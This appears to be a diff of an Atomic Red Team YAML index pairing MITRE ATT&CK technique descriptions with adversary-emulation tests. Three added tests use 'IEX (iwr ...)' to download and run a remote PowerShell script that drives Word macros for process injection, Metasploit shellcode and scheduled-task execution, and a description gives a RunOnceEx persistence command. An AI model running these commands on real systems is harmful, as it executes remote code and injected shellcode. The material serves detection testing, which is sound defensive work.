marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Print Processors + description: "Adversaries may abuse print processors to run malicious DLLs during + system boot for persistence and/or privilege escalation. Print processors + are DLLs that are loaded by the print spooler service, spoolsv.exe, during + boot. \n\nAdversaries may abuse the print spooler service by adding print + processors that load malicious DLLs at startup. A print processor can be installed + through the AddPrintProcessor API call with an account that has + SeLoadDriverPrivilege enabled. Alternatively, a print processor + can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet + or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: + e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry + key that points to the DLL. For the print processor to be correctly installed, + it must be located in the system print-processor directory that can be found + with the GetPrintProcessorDirectory API call.(Citation: Microsoft + AddPrintProcessor May 2018) After the print processors are installed, the + print spooler service, which starts during boot, must be restarted in order + for them to run.(Citation: ESET PipeMon May 2020) The print spooler service + runs under SYSTEM level permissions, therefore print processors installed + by an adversary may run under elevated privileges." + id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T16:05:36.344Z' + created: '2020-10-05T13:24:49.780Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. + + Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. + x_mitre_data_sources: + - Process monitoring + - Windows Registry + - File monitoring + - DLL monitoring + - API monitoring + x_mitre_contributors: + - Mathieu Tartare, ESET + x_mitre_platforms: + - Windows + atomic_tests: [] T1055.009: technique: external_references: @@ -5641,6 +5744,39 @@ privilege-escalation: ' name: powershell + - name: RunPE via VBA + auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b + description: 'This module executes calc.exe from within the WINWORD.EXE process + +' + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\") + \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" + name: powershell T1055: technique: id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d @@ -5778,6 +5914,37 @@ privilege-escalation: mavinject $mypid /INJECTRUNNING #{dll_payload} name: powershell elevation_required: true + - name: Shellcode execution via VBA + auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 + description: | + This module injects shellcode into a newly created process and executes. By default the shellcode is created, + with Metasploit, for use on x86-64 Windows 10 machines. + + Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office + is required. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'The 64-bit version of Microsoft Office must be installed + +' + prereq_command: | + try { + $wdApp = New-Object -COMObject "Word.Application" + $path = $wdApp.Path + Stop-Process -Name "winword" + if ($path.contains("(x86)")) { exit 1 } else { exit 0 } + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) + manually to meet this requirement" + +' + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" + name: powershell T1055.008: technique: external_references: @@ -6024,6 +6191,14 @@ privilege-escalation: description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. source_name: Microsoft Run Key + - source_name: Microsoft Wow6432Node 2018 + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry + description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data + in the Registry. Retrieved August 3, 2020. + - source_name: Malwarebytes Wow6432Node 2016 + url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ + description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved + August 3, 2020. - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018. @@ -6046,26 +6221,30 @@ privilege-escalation: Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The following run keys are created by default on Windows systems: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce - The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) + Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run @@ -6083,9 +6262,9 @@ privilege-escalation: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-25T16:16:26.182Z' + modified: '2020-08-03T16:30:26.918Z' created: '2020-01-23T22:02:48.566Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -6479,10 +6658,58 @@ privilege-escalation: >$null 2>&1 ' + - name: Task Scheduler via VBA + auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + description: | + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within + 30 - 40 seconds after this module has run + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\") + \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" + name: powershell T1053: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:30:46.977Z' + modified: '2020-10-14T15:20:01.069Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task/Job + description: |- + Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) + + Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). external_references: - source_name: mitre-attack external_id: T1053 @@ -6494,35 +6721,21 @@ privilege-escalation: description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016. source_name: TechNet Task Scheduler Security - description: |- - Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) - - Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). - name: Scheduled Task/Job - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:04.006Z' - created: '2017-05-31T21:30:46.977Z' - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_contributors: - - Prashant Verma, Paladion - - Leo Loobeek, @leoloobeek - - Travis Smith, Tripwire - - Alain Homewood, Insomnia Security - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + - Linux + - macOS + x_mitre_remote_support: true + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User x_mitre_detection: "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look @@ -6533,19 +6746,18 @@ privilege-escalation: part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement." - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_remote_support: true - x_mitre_platforms: - - Windows - - Linux - - macOS + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + - Windows event logs + x_mitre_contributors: + - Prashant Verma, Paladion + - Leo Loobeek, @leoloobeek + - Travis Smith, Tripwire + - Alain Homewood, Insomnia Security + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1546.002: technique: @@ -6707,9 +6919,9 @@ privilege-escalation: - source_name: mitre-attack external_id: T1574.010 url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-17 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/17.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -6727,7 +6939,7 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-26T19:37:28.912Z' + modified: '2020-09-16T19:10:04.262Z' created: '2020-03-12T20:43:53.998Z' x_mitre_contributors: - Travis Smith, Tripwire @@ -6762,9 +6974,9 @@ privilege-escalation: - source_name: mitre-attack external_id: T1574.011 url: https://attack.mitre.org/techniques/T1574/011 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-478 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/478.html - source_name: Registry Key Security url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. @@ -6815,7 +7027,7 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:01:09.906Z' + modified: '2020-09-16T19:07:48.590Z' created: '2020-03-13T11:42:14.444Z' x_mitre_defense_bypassed: - Application control @@ -7321,10 +7533,7 @@ privilege-escalation: service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious - commands at recurring intervals, such as at system boot.(Citation: Anomali - Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: - Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: - acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries + commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories @@ -7338,6 +7547,12 @@ privilege-escalation: - source_name: mitre-attack external_id: T1543.002 url: https://attack.mitre.org/techniques/T1543/002 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html - source_name: 'Linux man-pages: systemd January 2014' url: http://man7.org/linux/man-pages/man1/systemd.1.html description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. @@ -7350,18 +7565,6 @@ privilege-escalation: url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019. - - source_name: gist Arch package compromise 10JUL2018 - url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public - Arch package compromise. Retrieved April 23, 2019. - - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 - url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux - AUR Package Repository. Retrieved April 23, 2019. - - source_name: acroread package compromised Arch Linux Mail 8JUL2018 - url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved - April 23, 2019. - source_name: Rapid7 Service Persistence 22JUNE2016 url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence description: Rapid7. (2016, June 22). Service Persistence. Retrieved April @@ -7372,7 +7575,7 @@ privilege-escalation: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-25T22:13:59.473Z' + modified: '2020-10-09T13:46:29.701Z' created: '2020-01-17T16:15:19.870Z' x_mitre_platforms: - Linux @@ -7386,7 +7589,7 @@ privilege-escalation: - User - root x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.2' x_mitre_data_sources: - Process command-line parameters - Process monitoring @@ -7461,6 +7664,73 @@ privilege-escalation: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + T1053.006: + technique: + id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 + description: |- + Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) + + Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. + + An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. + name: Systemd Timers + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1053.006 + url: https://attack.mitre.org/techniques/T1053/006 + - source_name: archlinux Systemd Timers Aug 2020 + url: https://wiki.archlinux.org/index.php/Systemd/Timers + description: archlinux. (2020, August 11). systemd/Timers. Retrieved October + 12, 2020. + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux + AUR Package Repository. Retrieved April 23, 2019. + url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ + source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 + - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public + Arch package compromise. Retrieved April 23, 2019. + url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a + source_name: gist Arch package compromise 10JUL2018 + - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved + April 23, 2019. + url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html + source_name: acroread package compromised Arch Linux Mail 8JUL2018 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-14T15:20:00.754Z' + created: '2020-10-12T17:50:31.584Z' + x_mitre_platforms: + - Linux + x_mitre_contributors: + - SarathKumar Rajendran, Trimble Inc + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + x_mitre_detection: |- + Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] T1055.003: technique: external_references: @@ -7885,13 +8155,8 @@ privilege-escalation: atomic_tests: [] T1078: technique: - id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Valid Accounts - description: |- - Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. - - The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078 @@ -7907,8 +8172,13 @@ privilege-escalation: description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. source_name: TechNet Audit Policy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + description: |- + Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. + + The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + name: Valid Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -7919,13 +8189,31 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-06-20T22:44:36.043Z' + modified: '2020-10-19T16:01:22.724Z' created: '2017-05-31T21:31:00.645Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Netskope - - Mark Wee - - Praetorian + x_mitre_version: '2.1' + x_mitre_data_sources: + - AWS CloudTrail logs + - Stackdriver logs + - Authentication logs + - Process monitoring + x_mitre_defense_bypassed: + - Firewall + - Host intrusion prevention systems + - Network intrusion detection system + - Application control + - System access controls + - Anti-virus + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - User + - Administrator x_mitre_platforms: - Linux - macOS @@ -7936,29 +8224,11 @@ privilege-escalation: - SaaS - Office 365 - Azure AD - x_mitre_effective_permissions: - - User - - Administrator - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. - x_mitre_defense_bypassed: - - Firewall - - Host intrusion prevention systems - - Network intrusion detection system - - Application control - - System access controls - - Anti-virus - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_version: '2.1' + x_mitre_contributors: + - Netskope + - Mark Wee + - Praetorian + x_mitre_is_subtechnique: false atomic_tests: [] T1546.003: technique: @@ -8102,6 +8372,15 @@ privilege-escalation: - source_name: mitre-attack external_id: T1543.003 url: https://attack.mitre.org/techniques/T1543/003 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html - url: https://technet.microsoft.com/en-us/library/cc772408.aspx description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. source_name: TechNet Services @@ -8123,12 +8402,12 @@ privilege-escalation: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-25T22:22:10.041Z' + modified: '2020-09-16T15:49:58.490Z' created: '2020-01-17T19:13:50.402Z' x_mitre_platforms: - Windows x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are @@ -8668,7 +8947,7 @@ persistence: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-07-15T12:43:37.469Z' + modified: '2020-10-05T16:43:29.473Z' created: '2017-05-31T21:31:12.196Z' x_mitre_is_subtechnique: false x_mitre_version: '2.1' @@ -8925,42 +9204,59 @@ persistence: url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020. + - source_name: GCP SSH Key Add + url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add + description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved + October 1, 2020. + - source_name: Expel IO Evil in AWS + url: https://expel.io/blog/finding-evil-in-aws/ + description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding + Evil in AWS. Retrieved June 25, 2020. + - source_name: Expel Behind the Scenes + url: https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/ + description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, + July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved + October 1, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Additional Azure Service Principal Credentials - description: 'Adversaries may add adversary-controlled credentials for Azure - Service Principals in addition to existing legitimate credentials(Citation: - Create Azure Service Principal) to maintain persistent access to victim Azure - accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) - Azure Service Principals support both password and certificate credentials.(Citation: - Why AAD Service Principals) With sufficient permissions, there are a variety - of ways to add credentials including the Azure Portal, Azure command line - interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) - modules.(Citation: Demystifying Azure AD Service Principals)' + name: Additional Cloud Credentials + description: |- + Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. + + Adversaries may add credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals) + + 